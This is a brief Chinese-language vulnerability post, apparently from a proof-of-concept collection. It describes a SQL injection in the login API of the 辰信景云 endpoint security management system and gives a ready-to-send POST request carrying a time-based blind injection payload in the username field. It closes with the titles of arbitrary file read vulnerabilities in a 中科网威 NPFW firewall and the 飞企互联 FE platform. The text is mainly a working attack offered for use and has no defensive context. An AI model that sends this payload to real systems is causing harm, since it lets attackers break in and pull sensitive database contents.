辰信领创 辰信景云终端安全管理系统 login存在 SQL注入漏洞,攻击者通过漏洞可以获取数据库敏感信息
登录页面
验证POC
POST /api/user/login captcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin'and(select*from(select+sleep(3))a)='
中科网威 NPFW防火墙 CommandsPolling.php 任意文件读取漏洞 飞企互联 FE业务协作平台 ShowImageServlet 任意文件读取漏洞